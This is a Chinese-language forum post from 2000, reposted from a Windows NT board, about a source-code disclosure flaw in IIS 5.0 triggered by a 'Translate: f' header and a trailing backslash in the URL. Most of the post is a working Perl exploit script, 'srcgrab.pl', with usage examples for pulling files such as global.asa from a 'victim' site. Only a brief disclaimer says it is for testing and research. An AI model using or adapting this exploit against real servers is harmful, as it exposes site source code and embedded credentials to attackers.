发信人: ccaatt()
整理人: dongbao(2000-10-04 20:01:28), 站内信件
|
【 以下文字转载自 WinNT 讨论区 】
【 原文由 天水藍-萊茵哈特 所发表 】
iis5的asp泄露
当 IIS 5.0 接收到一个特殊格式的头 (Translate: f) 的 HTTP 请求,同时 UR
L 末尾包含一个特殊字符时,IIS 会使用错误的处理方法导致文件源代码泄漏。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自
负
#!/usr/bin/perl
# Expl0it By [email protected]
# Tested with sucess against IIS 5.0. Maybe it works against IIS 4.0 u
sing a shared drive but I haven磘 tested it yet.
# Get the source code of any script from the server using this exploit
.
# This code was written after Daniel Docekal brought this issue in Bug
Traq.
# Cheers 351 and FractalG :)
if (not $ARGV[0]) {
print qq~
Geee it磗 running !! kewl :)))
Usage : srcgrab.pl Example Usage : srcgrab.pl http://www.victimsite.co
m/global.asa
U can also save the retrieved file using : srcgrab.pl http://www.victi
m.com/default.asp > file_to_save
~; exit;}
$victimurl=$ARGV[0];
# Create a user agent object
use LWP::UserAgent;
$ua = new LWP::UserAgent;
# Create a request
my $req = new HTTP::Request GET => $victimurl . '\\'; # Here is the ba
ckslash at the end of the url ;)
$req->content_type('application/x-www-form-urlencoded');
$req->content_type('text/html');
$req->header(Translate => 'f'); # Here is the famous translate header
:))
$req->content('match=www&errors=0');
# Pass request to the user agent and get a response back
my $res = $ua->request($req);
# Check the outcome of the response
if ($res->is_success) {
print $res->content;
} else {
print $res->error_as_HTML;
}
--
梦想的世界 就在你眼前 渴望的真情 就该勇敢追 释放你自己 才会做的对
我的心在飞 希望还在身边 应该向前 敞开你胸怀 世界没有界限
OPEN YOUR HEART AND OPRN YOUR MIND OPEN YOUR THOUGHTS...
活的精彩
Open your eyes Open your mind Open your thoughts Don't stay behind...
※ 来源:.月光程序代码网 http://www.moon-soft.com.[FROM: 202.130.232.129]
--
※ 转载:.月光程序代码网 http://www.moon-soft.com.[FROM: 202.130.232.129]
|
|